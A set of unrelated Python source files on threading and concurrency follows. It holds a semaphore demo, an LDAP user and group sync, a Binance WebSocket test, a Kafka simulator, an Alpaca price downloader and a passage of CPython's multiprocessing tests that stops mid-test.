""" semaphore dapat digunakan untuk menentukan berapa banyak proses yang dapat mengakses shared resource semaphore dengan nilai 1, cuma mengizinkan satu proses untuk mengakses shared resource (sama dengan lock) """ import threading, time, random counter = 0 sem = threading.Semaphore(1) def worker(name): global counter for _ in range(10): if sem.acquire(timeout=0.1): counter = counter + 1 print(f"{name}: {counter}") time.sleep(random.random()) sem.release() else: print(f"{name} skipping") threads = [] for i in ['budi', 'agus', 'rudi']: thread = threading.Thread(target=worker, args=(i,)) thread.start() threads.append(thread) for t in threads: t.join()
initial_inbound_sync.py
#! /usr/bin/env python3 # Copyright 2018 Contributors to Hyperledger Sawtooth # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ----------------------------------------------------------------------------- # http://docs.python-requests.org/en/master/ import os import sys import json import logging from datetime import datetime, timezone import threading import rethinkdb as r import ldap3 from ldap3 import ALL, Connection, Server from rbac.providers.common.inbound_filters import ( inbound_user_filter, inbound_group_filter, ) from rbac.providers.common.common import save_sync_time, check_last_sync from rbac.providers.ldap.delta_inbound_sync import inbound_delta_sync from rbac.providers.common.rethink_db import connect_to_db LOGGER = logging.getLogger(__name__) LOGGER.level = logging.DEBUG LOGGER.addHandler(logging.StreamHandler(sys.stdout)) DB_HOST = os.getenv("DB_HOST", "rethink") DB_PORT = int(float(os.getenv("DB_PORT", "28015"))) DB_NAME = os.getenv("DB_NAME", "rbac") LDAP_DC = os.getenv("LDAP_DC") LDAP_SERVER = os.getenv("LDAP_SERVER") LDAP_USER = os.getenv("LDAP_USER") LDAP_PASS = os.getenv("LDAP_PASS") LDAP_FILTER_USER = "(objectClass=person)" LDAP_FILTER_GROUP = "(objectClass=group)" def fetch_ldap_data(data_type): """ Call to get entries for all (Users | Groups) in Active Directory, saves the time of the sync, inserts data into RethinkDB, and initiates a new thread for a delta sync for data_type. """ connect_to_db() if data_type == "user": search_filter = LDAP_FILTER_USER elif data_type == "group": search_filter = LDAP_FILTER_GROUP server = Server(LDAP_SERVER, get_info=ALL) conn = Connection(server, user=LDAP_USER, password=LDAP_PASS) if not conn.bind(): LOGGER.error( "Error connecting to LDAP server %s : %s", LDAP_SERVER, conn.result ) conn.search( search_base=LDAP_DC, search_filter=search_filter, attributes=ldap3.ALL_ATTRIBUTES, ) insert_to_db(data_dict=conn.entries, data_type=data_type) sync_source = "ldap-" + data_type provider_id = LDAP_DC save_sync_time(provider_id, sync_source, "initial") def insert_to_db(data_dict, data_type): """Insert (Users | Groups) individually to RethinkDB from dict of data and begins delta sync timer.""" for entry in data_dict: entry_data = json.loads(entry.entry_to_json())["attributes"] if data_type == "user": standardized_entry = inbound_user_filter(entry_data, "ldap") elif data_type == "group": standardized_entry = inbound_group_filter(entry_data, "ldap") inbound_entry = { "data": standardized_entry, "data_type": data_type, "timestamp": datetime.now().replace(tzinfo=timezone.utc).isoformat(), "provider_id": LDAP_DC, } r.table("inbound_queue").insert(inbound_entry).run() LOGGER.info( "Inserted %s %s records into inbound_queue.", str(len(data_dict)), data_type ) def initiate_delta_sync(): """Starts a new delta sync thread for LDAP data_type.""" threading.Thread(target=inbound_delta_sync).start() def initialize_ldap_sync(): """ Checks if LDAP initial syncs has been ran. If not, run initial sync for both ldap users and groups. If initial syncs have been completed, restart the inbound delta syncs. """ if LDAP_DC: connect_to_db() user_sync_completed = False group_sync_completed = False db_user_payload = check_last_sync("ldap-user", "initial") if not db_user_payload: LOGGER.info( "No initial AD user sync was found. Starting initial AD user sync now." ) LOGGER.info("Getting AD Users...") fetch_ldap_data(data_type="user") LOGGER.info("Initial AD user upload completed.") user_sync_completed = True db_group_payload = check_last_sync("ldap-group", "initial") if not db_group_payload: LOGGER.info( "No initial AD group sync was found. Starting initial AD group sync now." ) LOGGER.info("Getting Groups with Members...") fetch_ldap_data(data_type="group") LOGGER.info("Initial AD group upload completed.") group_sync_completed = True if user_sync_completed and group_sync_completed: initiate_delta_sync() else: LOGGER.info( "Initial syncs did not complete successfully, LDAP delta sync will not start." ) if db_user_payload and db_group_payload: LOGGER.info("The LDAP initial sync has already been run.") initiate_delta_sync() else: LOGGER.info("LDAP Domain Controller is not provided, skipping LDAP sync.")
dev_test_cex_subscribe.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # File: dev_test_cex_subscribe.py # # Part of ‘UNICORN Binance WebSocket API’ # Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api # Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api # PyPI: https://pypi.org/project/unicorn-binance-websocket-api/ # # Author: Oliver Zehentleitner # https://about.me/oliver-zehentleitner # # Copyright (c) 2019-2020, Oliver Zehentleitner # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager import logging import time import threading import os # https://docs.python.org/3/library/logging.html#logging-levels logging.basicConfig(level=logging.DEBUG, filename=os.path.basename(__file__) + '.log', format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}", style="{") def print_stream_data_from_stream_buffer(binance_websocket_api_manager): while True: if binance_websocket_api_manager.is_manager_stopping(): exit(0) oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer() if oldest_stream_data_from_stream_buffer is False: time.sleep(0.01) else: #print(oldest_stream_data_from_stream_buffer) pass # create instance of BinanceWebSocketApiManager for Binance Chain DEX binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com") # start a worker process to move the received stream_data from the stream_buffer to a print function worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,)) worker_thread.start() #markets = ['xrpusdt', 'rvnbtc'] markets = ['xrpusdt'] stream_id = binance_websocket_api_manager.create_stream(["kline_1m"], markets) time.sleep(2) binance_websocket_api_manager.get_stream_subscriptions(stream_id) #binance_websocket_api_manager.subscribe_to_stream(stream_id, # channels=['kline_1m', 'kline_5m', 'marketDepth', # 'ticker', 'miniTicker', 'marketDiff']) #binance_websocket_api_manager.subscribe_to_stream(stream_id, channels="arr", markets="!miniTicker") #time.sleep(5) #binance_websocket_api_manager.get_stream_subscriptions(stream_id) markets = ['xrpbearbusd', 'zeceth', 'cndbtc', 'dashbtc', 'atompax', 'perlbtc', 'ardreth', 'zecbnb', 'bchabctusd', 'usdsbusdt', 'winbnb', 'xzcxrp', 'bchusdc', 'wavesbnb', 'kavausdt', 'btsusdt', 'chzbnb', 'tusdbnb', 'xtzbusd', 'bcptusdc', 'dogebnb', 'eosbearusdt', 'ambbnb', 'wrxbnb', 'poabtc', 'wanbtc', 'ardrbtc', 'icnbtc', 'tusdusdt', 'atombusd', 'nxseth', 'bnbusdt', 'trxxrp', 'erdpax', 'erdbtc', 'icxbusd', 'nulsbtc', 'hotusdt', 'wavespax', 'zilbnb', 'arnbtc', 'nulsusdt', 'wintrx', 'npxsbtc', 'busdtry', 'qtumbnb', 'eosbtc', 'xlmpax', 'tomobnb', 'eosbnb', 'engbtc', 'linketh', 'xrpbtc', 'fetbtc', 'stratusdt', 'navbnb', 'bcneth', 'yoyobtc', 'nanobnb', 'saltbtc', 'tfuelusdc', 'skybnb', 'fuelbtc', 'bnbusdc', 'inseth', 'btcpax', 'batbtc', 'rlceth', 'arketh', 'ltcpax', 'ltcbusd', 'duskbtc', 'mftusdt', 'bntusdt', 'mdabtc', 'enjbtc', 'poabnb', 'nanobusd', 'paxtusd', 'hotbtc', 'bcdbtc', 'beambnb', 'trxeth', 'omgbnb', 'cdtbtc', 'eosusdc', 'dashbusd', 'cocosbtc', 'dasheth', 'xrptusd', 'atomtusd', 'rcneth', 'rpxeth', 'xlmusdc', 'aionbusd', 'nxsbtc', 'chateth', 'repbtc', 'tctusdt', 'linkusdt', 'nasbtc', 'usdsusdc', 'xvgbtc', 'elfeth', 'ctxcbtc', 'cmteth', 'gnteth', 'usdspax', 'zilbtc', 'batpax', 'stratbtc', 'xzcbtc', 'iotausdt', 'etcbnb', 'ankrusdt', 'xlmeth', 'loombtc', 'erdusdc', 'rdnbnb', 'icneth', 'vetbtc', 'cvcusdt', 'ftmpax', 'ethbullusdt', 'edoeth', 'steemeth', 'gobnb', 'hsrbtc', 'ambbtc', 'bchabcbtc', 'dntbtc', 'btctusd', 'denteth', 'snglsbtc', 'eosbullusdt', 'xlmtusd', 'tnteth', 'sysbnb', 'renusdt', 'zrxusdt', 'xlmbtc', 'stormbtc', 'ncashbnb', 'omgusdt', 'troyusdt', 'venbtc', 'modbtc', 'dogepax', 'ontusdc', 'eurbusd', 'tctbnb', 'gxsbtc', 'celrbnb', 'adausdt', 'beambtc', 'elfbtc', 'celrbtc', 'rvnusdt', 'poaeth', 'wavesusdc', 'trxbnb', 'trxusdc', 'ethbearusdt', 'ethpax', 'bateth', 'kavabtc', 'paxbtc', 'trigbnb', 'btcusdc', 'oneusdc', 'xrptry', 'stxusdt', 'strateth', 'lendeth', 'neousdc', 'neobnb', 'cosbtc', 'powreth', 'rlcusdt', 'hbarbnb', 'wabieth', 'bqxeth', 'aionbtc', 'aeeth', 'mthbtc', 'wrxbtc', 'pptbtc', 'nknbtc', 'zecusdt', 'stormeth', 'qtumusdt'] time.sleep(2) binance_websocket_api_manager.subscribe_to_stream(stream_id, channels=['kline_1m', 'marketDepth', 'ticker', 'miniTicker', 'marketDiff'], markets=markets) time.sleep(10) binance_websocket_api_manager.get_stream_subscriptions(stream_id) results = binance_websocket_api_manager.get_results_from_endpoints() print(str(results)) time.sleep(5) for result in results: print(str(result)) while True: #binance_websocket_api_manager.print_summary() binance_websocket_api_manager.print_stream_info(stream_id) time.sleep(1)
app.py
##################################################################### # # Data Simulator for Apache Kafka # # Deployed as a container (scaled with Kubernetes, GKE) # # Test with python 3.7 # https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh # # Prereqs: # pip install kafka-python # ##################################################################### from kafka import KafkaProducer import json import re import datetime, time import random import argparse import threading import params def simulate_payload(): datetimestamp = datetime.datetime.now() payload = { 'id': datetimestamp.strftime('%Y%m%d%H%M%S%f'), 'date': datetimestamp.strftime('%Y-%m-%d'), 'timestamp': datetimestamp.strftime('%H:%M:%S.%f'), 'flag': random.randint(0,1), 'value': random.triangular(35,70,175) } return payload def initialize_kafka_producer(params): try: producer = KafkaProducer(bootstrap_servers=params['bootstrap_servers'], value_serializer=lambda v: json.dumps(v).encode('utf-8')) # JSON-based Producer except Exception as e: print('[ EXCEPTION ] Could not connect to Kafka bootstrap server - {}'.format(e)) return producer def publish_kafka_event(params, producer, counter): while True: payload = simulate_payload() payload['counter'] = counter if params['send_to_kafka']==1: try: producer.send(params['kafka_topic'], value=payload) # JSON-based kafka commit except Exception as e: print('[ EXCEPTION ] Failure sending JSON payload to Kafka producer - {}'.format(e)) else: print('{}\n'.format(payload)) time.sleep(params['time_delay']) if __name__ == "__main__": params = { 'bootstrap_servers' : 'kafka-server1-vm:9092', 'send_to_kafka' : 1, 'kafka_topic' : 'topicz1', 'time_delay' : 5, 'number_of_threads' : 100 } producer = initialize_kafka_producer(params) threads = [] for i in range(params['number_of_threads']): threads.append(threading.Thread(target=publish_kafka_event, args=(params, producer, i,))) for thread in threads: thread.start() #ZEND
alpacaHistorical.py
import json import threading from threading import Thread import time import logging from datetime import datetime, timedelta from enum import Enum import requests from alpaca_trade_api.rest import REST, TimeFrame from .yahooFin import YahooFin from util import AlpacaAccess, RedisTimeFrame custom_header = { 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'} response = requests.get('https://www.dev2qa.com', headers=custom_header) class TimePeriod(Enum): REALTIME = "0" Min1 = "1Min" Min5 = "5Min" Min10 = "10Min" Min15 = "15Min" Min30 = "30Min" Hour = "Hour" Hour4 = "4Hour" Day = "Day" Week = "Week" class AlpacaHistorical: ALPACA_URL = 'https://data.alpaca.markets/v2/stocks/%s/bars?start=%s&end=%s&timeframe=%s' CRYPTO_URL = 'https://data.alpaca.markets/v1beta1/crypto/%sUSD/bars?start=%s&end=%s&timeframe=%s&exchanges=CBSE' CsvHeader = "Date, Open, High, Low, Close, Adj Close, Volume" conn: REST = None def __init__(self): self.custom_header = AlpacaAccess.CustomHeader() def timeframe_start(self, timeframe): switcher = { RedisTimeFrame.REALTIME: datetime.now() - timedelta(minutes=30), RedisTimeFrame.MIN1: datetime.now() - timedelta(minutes=30), RedisTimeFrame.MIN2: datetime.now() - timedelta(minutes=60), RedisTimeFrame.MIN5: datetime.now() - timedelta(minutes=150), RedisTimeFrame.MIN30: datetime.now() - timedelta(days=2), RedisTimeFrame.HOUR: datetime.now() - timedelta(days=28), RedisTimeFrame.DAILY: datetime.now() - timedelta(days=360), RedisTimeFrame.WEEKLY: datetime.now() - timedelta(days=1080), } dt = switcher.get(timeframe, datetime.now()) date_string = dt.isoformat('T') + 'Z' return date_string # return "2021-02-08" def timeframe_end(self, timeframe): dt = datetime.now() date_string = dt.isoformat('T') + 'Z' return date_string # return "2021-02-10" def columnName(self, datatype): switcher = { "open": "o", "close": "c", "high": "h", "low": "l", "volume": "v" } return switcher.get(datatype, 'c') def reverseArray(self, arrayData): return arrayData[::-1] def column(self, matrix, i): return [row[i] for row in matrix] def adjustPrices(self, data, datatype): result = json.loads(data.text) bars = result['bars'] if bars is None: return [] data = self.reverseArray(bars) if datatype is None: return data else: dtype = self.columnName(datatype) prices = self.column(data, dtype) return prices def HistoricalPrices(self, symbol, timeframe, datatype=None, starttime=None, endtime=None): start = self.timeframe_start( timeframe) if starttime is None else starttime end = self.timeframe_end(timeframe) if endtime is None else endtime tf = '1Min' if RedisTimeFrame.REALTIME == timeframe else timeframe url = AlpacaHistorical.ALPACA_URL % ( symbol, start, end, tf) data = requests.get(url, headers=self.custom_header) bars = self.adjustPrices(data, datatype) return bars def CryptoPrices(self, symbol, timeframe, datatype=None, starttime=None, endtime=None): start = self.timeframe_start( timeframe) if starttime is None else starttime end = self.timeframe_end(timeframe) if endtime is None else endtime tf = '1Min' if RedisTimeFrame.REALTIME == timeframe else timeframe url = AlpacaHistorical.CRYPTO_URL % ( symbol, start, end, tf) data = requests.get(url, headers=self.custom_header) bars = self.adjustPrices(data, datatype) return bars def CommodityPrices(self, symbol, timeframe, datatype=None, starttime=None, endtime=None): # logging.info(f'AlpacaHistorical.CommodityPrices {symbol} {timeframe} {datatype}') bars = YahooFin.HistoricalPrices(symbol) return bars def WriteToFile(self, symbol, data): text = "{}, {}, {}, {}, {}, {}, {}" historicalText = [text.format(x['t'], x['o'], x['h'], x['l'], x['c'], x['c'], x['v']) for x in data] filename = './data/stocks/' + symbol + '.csv' with open(filename, 'w') as f: f.write(self.CsvHeader + '\n') for line in historicalText: f.write(line + '\n') class AlpacaHistoricalData(AlpacaHistorical): def __init__(self, startdate=None, enddate=None): super().__init__() self.startdate = startdate self.enddate = enddate def getDataLine(self, app, line, fw): try: timeframe = RedisTimeFrame.DAILY symbol = line.split(',')[0] if self.startdate is not None and self.enddate is not None: data = self.HistoricalPrices(symbol, timeframe, starttime=self.startdate, endtime=self.enddate) else: data = app.HistoricalPrices(symbol, timeframe) app.WriteToFile(symbol, data) fw.write(line) except Exception as e: logging.error(f'AlpacaHistoricalData.getDataLine {symbol} - {e}') print(e) def Run(self, filename=None, isDebug=False): # logging.info('AlpacaHistoricalData.Run') filename = './data/symbols.csv' if filename == None else filename with open(filename, 'r') as f: lines = f.readlines() # print(lines) logging.error(f'AlpacaHistoricalData.Run - lines {len(lines)}') with open(filename, "w") as fw: fw.write(self.CsvHeader + '\n') timeframe = RedisTimeFrame.DAILY app = AlpacaHistorical() lineCount = 0 for line in lines: if (isDebug): lineCount += 1 print(lineCount) Thread(target=self.getDataLine, args=(app, line, fw)).start() while (threading.activeCount() > 10): time.sleep(2) if threading.activeCount() > 0: time.sleep(2) @staticmethod def All(startdate=None, enddate=None): if (startdate is None and enddate is None): app = AlpacaHistoricalData() app.Run(isDebug=True) elif (startdate and enddate is None): # convert string to datetime enddate = datetime.strptime(startdate, '%Y-%m-%d') startdate = enddate - timedelta(days=400) app = AlpacaHistoricalData(startdate, enddate) app.Run(isDebug=True) elif (startdate and enddate): enddate = datetime.strptime(enddate, '%Y-%m-%d') startdate = datetime.strptime(startdate, '%Y-%m-%d') app = AlpacaHistoricalData(startdate, enddate) app.Run(isDebug=True) if __name__ == "__main__": AlpacaHistoricalData.All() # timeframe = RedisTimeFrame.DAILY # symbol = "AAPL" # app = AlpacaHistorical() # data = app.HistoricalPrices(symbol, timeframe) # app.WriteToFile(symbol, data) # # print('done')
test_multiprocessing.py
#!/usr/bin/env python # # Unit tests for the multiprocessing package # import unittest import Queue import time import sys import os import gc import signal import array import socket import random import logging import errno import test.script_helper from test import test_support from StringIO import StringIO _multiprocessing = test_support.import_module('_multiprocessing') # import threading after _multiprocessing to raise a more relevant error # message: "No module named _multiprocessing". _multiprocessing is not compiled # without thread support. import threading # Work around broken sem_open implementations test_support.import_module('multiprocessing.synchronize') import multiprocessing.dummy import multiprocessing.connection import multiprocessing.managers import multiprocessing.heap import multiprocessing.pool from multiprocessing import util try: from multiprocessing import reduction HAS_REDUCTION = True except ImportError: HAS_REDUCTION = False try: from multiprocessing.sharedctypes import Value, copy HAS_SHAREDCTYPES = True except ImportError: HAS_SHAREDCTYPES = False try: import msvcrt except ImportError: msvcrt = None # # # latin = str # # Constants # LOG_LEVEL = util.SUBWARNING #LOG_LEVEL = logging.DEBUG DELTA = 0.1 CHECK_TIMINGS = False # making true makes tests take a lot longer # and can sometimes cause some non-serious # failures because some calls block a bit # longer than expected if CHECK_TIMINGS: TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4 else: TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1 HAVE_GETVALUE = not getattr(_multiprocessing, 'HAVE_BROKEN_SEM_GETVALUE', False) WIN32 = (sys.platform == "win32") try: MAXFD = os.sysconf("SC_OPEN_MAX") except: MAXFD = 256 # # Some tests require ctypes # try: from ctypes import Structure, c_int, c_double except ImportError: Structure = object c_int = c_double = None def check_enough_semaphores(): """Check that the system supports enough semaphores to run the test.""" # minimum number of semaphores available according to POSIX nsems_min = 256 try: nsems = os.sysconf("SC_SEM_NSEMS_MAX") except (AttributeError, ValueError): # sysconf not available or setting not available return if nsems == -1 or nsems >= nsems_min: return raise unittest.SkipTest("The OS doesn't support enough semaphores " "to run the test (required: %d)." % nsems_min) # # Creates a wrapper for a function which records the time it takes to finish # class TimingWrapper(object): def __init__(self, func): self.func = func self.elapsed = None def __call__(self, *args, **kwds): t = time.time() try: return self.func(*args, **kwds) finally: self.elapsed = time.time() - t # # Base class for test cases # class BaseTestCase(object): ALLOWED_TYPES = ('processes', 'manager', 'threads') def assertTimingAlmostEqual(self, a, b): if CHECK_TIMINGS: self.assertAlmostEqual(a, b, 1) def assertReturnsIfImplemented(self, value, func, *args): try: res = func(*args) except NotImplementedError: pass else: return self.assertEqual(value, res) # For the sanity of Windows users, rather than crashing or freezing in # multiple ways. def __reduce__(self, *args): raise NotImplementedError("shouldn't try to pickle a test case") __reduce_ex__ = __reduce__ # # Return the value of a semaphore # def get_value(self): try: return self.get_value() except AttributeError: try: return self._Semaphore__value except AttributeError: try: return self._value except AttributeError: raise NotImplementedError # # Testcases # class _TestProcess(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') def test_current(self): if self.TYPE == 'threads': return current = self.current_process() authkey = current.authkey self.assertTrue(current.is_alive()) self.assertTrue(not current.daemon) self.assertIsInstance(authkey, bytes) self.assertTrue(len(authkey) > 0) self.assertEqual(current.ident, os.getpid()) self.assertEqual(current.exitcode, None) @classmethod def _test(cls, q, *args, **kwds): current = cls.current_process() q.put(args) q.put(kwds) q.put(current.name) if cls.TYPE != 'threads': q.put(bytes(current.authkey)) q.put(current.pid) def test_process(self): q = self.Queue(1) e = self.Event() args = (q, 1, 2) kwargs = {'hello':23, 'bye':2.54} name = 'SomeProcess' p = self.Process( target=self._test, args=args, kwargs=kwargs, name=name ) p.daemon = True current = self.current_process() if self.TYPE != 'threads': self.assertEqual(p.authkey, current.authkey) self.assertEqual(p.is_alive(), False) self.assertEqual(p.daemon, True) self.assertNotIn(p, self.active_children()) self.assertTrue(type(self.active_children()) is list) self.assertEqual(p.exitcode, None) p.start() self.assertEqual(p.exitcode, None) self.assertEqual(p.is_alive(), True) self.assertIn(p, self.active_children()) self.assertEqual(q.get(), args[1:]) self.assertEqual(q.get(), kwargs) self.assertEqual(q.get(), p.name) if self.TYPE != 'threads': self.assertEqual(q.get(), current.authkey) self.assertEqual(q.get(), p.pid) p.join() self.assertEqual(p.exitcode, 0) self.assertEqual(p.is_alive(), False) self.assertNotIn(p, self.active_children()) @classmethod def _test_terminate(cls): time.sleep(1000) def test_terminate(self): if self.TYPE == 'threads': return p = self.Process(target=self._test_terminate) p.daemon = True p.start() self.assertEqual(p.is_alive(), True) self.assertIn(p, self.active_children()) self.assertEqual(p.exitcode, None) p.terminate() join = TimingWrapper(p.join) self.assertEqual(join(), None) self.assertTimingAlmostEqual(join.elapsed, 0.0) self.assertEqual(p.is_alive(), False) self.assertNotIn(p, self.active_children()) p.join() # XXX sometimes get p.exitcode == 0 on Windows ... #self.assertEqual(p.exitcode, -signal.SIGTERM) def test_cpu_count(self): try: cpus = multiprocessing.cpu_count() except NotImplementedError: cpus = 1 self.assertTrue(type(cpus) is int) self.assertTrue(cpus >= 1) def test_active_children(self): self.assertEqual(type(self.active_children()), list) p = self.Process(target=time.sleep, args=(DELTA,)) self.assertNotIn(p, self.active_children()) p.daemon = True p.start() self.assertIn(p, self.active_children()) p.join() self.assertNotIn(p, self.active_children()) @classmethod def _test_recursion(cls, wconn, id): from multiprocessing import forking wconn.send(id) if len(id) < 2: for i in range(2): p = cls.Process( target=cls._test_recursion, args=(wconn, id+[i]) ) p.start() p.join() def test_recursion(self): rconn, wconn = self.Pipe(duplex=False) self._test_recursion(wconn, []) time.sleep(DELTA) result = [] while rconn.poll(): result.append(rconn.recv()) expected = [ [], [0], [0, 0], [0, 1], [1], [1, 0], [1, 1] ] self.assertEqual(result, expected) @classmethod def _test_sys_exit(cls, reason, testfn): sys.stderr = open(testfn, 'w') sys.exit(reason) def test_sys_exit(self): # See Issue 13854 if self.TYPE == 'threads': return testfn = test_support.TESTFN self.addCleanup(test_support.unlink, testfn) for reason, code in (([1, 2, 3], 1), ('ignore this', 0)): p = self.Process(target=self._test_sys_exit, args=(reason, testfn)) p.daemon = True p.start() p.join(5) self.assertEqual(p.exitcode, code) with open(testfn, 'r') as f: self.assertEqual(f.read().rstrip(), str(reason)) for reason in (True, False, 8): p = self.Process(target=sys.exit, args=(reason,)) p.daemon = True p.start() p.join(5) self.assertEqual(p.exitcode, reason) # # # class _UpperCaser(multiprocessing.Process): def __init__(self): multiprocessing.Process.__init__(self) self.child_conn, self.parent_conn = multiprocessing.Pipe() def run(self): self.parent_conn.close() for s in iter(self.child_conn.recv, None): self.child_conn.send(s.upper()) self.child_conn.close() def submit(self, s): assert type(s) is str self.parent_conn.send(s) return self.parent_conn.recv() def stop(self): self.parent_conn.send(None) self.parent_conn.close() self.child_conn.close() class _TestSubclassingProcess(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_subclassing(self): uppercaser = _UpperCaser() uppercaser.daemon = True uppercaser.start() self.assertEqual(uppercaser.submit('hello'), 'HELLO') self.assertEqual(uppercaser.submit('world'), 'WORLD') uppercaser.stop() uppercaser.join() # # # def queue_empty(q): if hasattr(q, 'empty'): return q.empty() else: return q.qsize() == 0 def queue_full(q, maxsize): if hasattr(q, 'full'): return q.full() else: return q.qsize() == maxsize class _TestQueue(BaseTestCase): @classmethod def _test_put(cls, queue, child_can_start, parent_can_continue): child_can_start.wait() for i in range(6): queue.get() parent_can_continue.set() def test_put(self): MAXSIZE = 6 queue = self.Queue(maxsize=MAXSIZE) child_can_start = self.Event() parent_can_continue = self.Event() proc = self.Process( target=self._test_put, args=(queue, child_can_start, parent_can_continue) ) proc.daemon = True proc.start() self.assertEqual(queue_empty(queue), True) self.assertEqual(queue_full(queue, MAXSIZE), False) queue.put(1) queue.put(2, True) queue.put(3, True, None) queue.put(4, False) queue.put(5, False, None) queue.put_nowait(6) # the values may be in buffer but not yet in pipe so sleep a bit time.sleep(DELTA) self.assertEqual(queue_empty(queue), False) self.assertEqual(queue_full(queue, MAXSIZE), True) put = TimingWrapper(queue.put) put_nowait = TimingWrapper(queue.put_nowait) self.assertRaises(Queue.Full, put, 7, False) self.assertTimingAlmostEqual(put.elapsed, 0) self.assertRaises(Queue.Full, put, 7, False, None) self.assertTimingAlmostEqual(put.elapsed, 0) self.assertRaises(Queue.Full, put_nowait, 7) self.assertTimingAlmostEqual(put_nowait.elapsed, 0) self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1) self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1) self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2) self.assertTimingAlmostEqual(put.elapsed, 0) self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3) self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3) child_can_start.set() parent_can_continue.wait() self.assertEqual(queue_empty(queue), True) self.assertEqual(queue_full(queue, MAXSIZE), False) proc.join() @classmethod def _test_get(cls, queue, child_can_start, parent_can_continue): child_can_start.wait() #queue.put(1) queue.put(2) queue.put(3) queue.put(4) queue.put(5) parent_can_continue.set() def test_get(self): queue = self.Queue() child_can_start = self.Event() parent_can_continue = self.Event() proc = self.Process( target=self._test_get, args=(queue, child_can_start, parent_can_continue) ) proc.daemon = True proc.start() self.assertEqual(queue_empty(queue), True) child_can_start.set() parent_can_continue.wait() time.sleep(DELTA) self.assertEqual(queue_empty(queue), False) # Hangs unexpectedly, remove for now #self.assertEqual(queue.get(), 1) self.assertEqual(queue.get(True, None), 2) self.assertEqual(queue.get(True), 3) self.assertEqual(queue.get(timeout=1), 4) self.assertEqual(queue.get_nowait(), 5) self.assertEqual(queue_empty(queue), True) get = TimingWrapper(queue.get) get_nowait = TimingWrapper(queue.get_nowait) self.assertRaises(Queue.Empty, get, False) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(Queue.Empty, get, False, None) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(Queue.Empty, get_nowait) self.assertTimingAlmostEqual(get_nowait.elapsed, 0) self.assertRaises(Queue.Empty, get, True, TIMEOUT1) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1) self.assertRaises(Queue.Empty, get, False, TIMEOUT2) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3) proc.join() @classmethod def _test_fork(cls, queue): for i in range(10, 20): queue.put(i) # note that at this point the items may only be buffered, so the # process cannot shutdown until the feeder thread has finished # pushing items onto the pipe. def test_fork(self): # Old versions of Queue would fail to create a new feeder # thread for a forked process if the original process had its # own feeder thread. This test checks that this no longer # happens. queue = self.Queue() # put items on queue so that main process starts a feeder thread for i in range(10): queue.put(i) # wait to make sure thread starts before we fork a new process time.sleep(DELTA) # fork process p = self.Process(target=self._test_fork, args=(queue,)) p.daemon = True p.start() # check that all expected items are in the queue for i in range(20): self.assertEqual(queue.get(), i) self.assertRaises(Queue.Empty, queue.get, False) p.join() def test_qsize(self): q = self.Queue() try: self.assertEqual(q.qsize(), 0) except NotImplementedError: return q.put(1) self.assertEqual(q.qsize(), 1) q.put(5) self.assertEqual(q.qsize(), 2) q.get() self.assertEqual(q.qsize(), 1) q.get() self.assertEqual(q.qsize(), 0) @classmethod def _test_task_done(cls, q): for obj in iter(q.get, None): time.sleep(DELTA) q.task_done() def test_task_done(self): queue = self.JoinableQueue() if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'): self.skipTest("requires 'queue.task_done()' method") workers = [self.Process(target=self._test_task_done, args=(queue,)) for i in xrange(4)] for p in workers: p.daemon = True p.start() for i in xrange(10): queue.put(i) queue.join() for p in workers: queue.put(None) for p in workers: p.join() # # # class _TestLock(BaseTestCase): def test_lock(self): lock = self.Lock() self.assertEqual(lock.acquire(), True) self.assertEqual(lock.acquire(False), False) self.assertEqual(lock.release(), None) self.assertRaises((ValueError, threading.ThreadError), lock.release) def test_rlock(self): lock = self.RLock() self.assertEqual(lock.acquire(), True) self.assertEqual(lock.acquire(), True) self.assertEqual(lock.acquire(), True) 